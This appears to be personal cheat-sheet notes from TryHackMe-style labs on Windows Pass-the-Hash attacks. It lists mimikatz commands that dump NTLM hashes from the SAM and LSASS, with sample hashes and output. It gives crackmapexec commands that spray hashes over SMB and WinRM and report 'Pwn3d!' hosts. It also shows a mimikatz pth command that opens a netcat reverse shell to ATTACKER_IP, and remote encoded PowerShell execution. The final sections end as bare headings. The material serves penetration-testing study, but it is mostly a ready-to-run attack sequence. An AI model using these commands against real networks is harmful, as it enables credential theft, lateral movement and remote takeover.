Pass the hash
As a result of extracting credentials from a host where we have attained local administrative privileges (by using mimikatz or similar tools), we might get clear-text passwords or hashes that can be easily cracked. However, if we aren't lucky enough, we will end up with non-cracked NTLM password hashes.
Although it may seem we can't really use those hashes, the NTLM challenge sent during authentication can be responded to just by knowing the password hash. This means we can authenticate without requiring the plaintext password to be known. Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can Pass-the-Hash (PtH) and authenticate successfully.
To extract NTLM hashes, we can either use mimikatz to read the local SAM or extract hashes directly from LSASS memory.
Tools
smb
crackmapexec smb $IP_DC01 -u 'tom_admin' -H 4979d69d4ca66955c075c41cf45f24dc
crackmapexec smb $IP_MS01 -u user.txt -H uhash.txt
crackmapexec winrm $IP_MS01 -u 'tom_admin' -H 4979d69d4ca66955c075c41cf45f24dc
crackmapexec winrm $IP_MS01 -u user.txt -H uhash.txt
Extracting NTLM
hashes from local SAM
This method will only allow you to get hashes from local users on the machine. No domain user's hashes will be available.
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> lsadump::sam
|->
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 145e02c50333951f71d13c245d352b50
hashes from LSASS memory
This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine.
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> sekurlsa::msv
|->
Authentication Id : 0 ; 308124 (00000000:0004b39c)
Session : RemoteInteractive from 2
User Name : bob.jenkins
Domain : ZA
Logon Server : THMDC
Logon Time : 2022/04/22 09:55:02
SID : S-1-5-21-3330634377-1326264276-632209373-4605
msv :
[00000003] Primary
* Username : bob.jenkins
* Domain : ZA
* NTLM : 6b4a57f67805a663c818106dc0648484
Enumeration with hash
local administrator
crackmapexec smb 172.16.7.1/23 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99 --local-auth
|->
# SMB 172.16.7.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:DC01) (signing:True) (SMBv1:False)
# SMB 172.16.7.3 445 DC01 [-] DC01\administrator:bdaffbfe64f1fc646a3353be1c2c3c99 STATUS_LOGON_FAILURE
# SMB 172.16.7.50 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
# SMB 172.16.7.50 445 MS01 [+] MS01\administrator bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!) 🔥
# SMB 172.16.7.60 445 SQL01 [*] Windows 10.0 Build 17763 x64 (name:SQL01) (domain:SQL01) (signing:False) (SMBv1:False)
# SMB 172.16.7.60 445 SQL01 [+] SQL01\administrator bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!) 🔥
domain user
Pass the hash
From windows - use hash to execute command as other user
attack happen on the same machine
We can then use the extracted hashes to perform a PtH attack by using mimikatz to inject an access token for the victim user on a reverse shell (or any other command you like) as follows:
mimikatz> token::revert
mimikatz> sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"
Interestingly, if you run the whoami command on this shell, it will still show you the original user you were using before doing PtH, but any command run from here will actually use the credentials we injected using PtH.
From linux - use hash to access windows machine
from linux to windows machine attack
If you have access to a linux box (like your AttackBox), several tools have built-in support to perform PtH using different protocols. Depending on which services are available to you, you can do the following:
Execute command
crackmapexec winrm 172.16.7.60 -u Administrator --port 5985 -H bdaffbfe64f1fc646a3353be1c2c3c99 -X 'powershell -e <BASE64>'
Connect to RDP using PtH
Connect via psexec using PtH
Note: Only the linux version of psexec support PtH.Connect to WinRM using PtH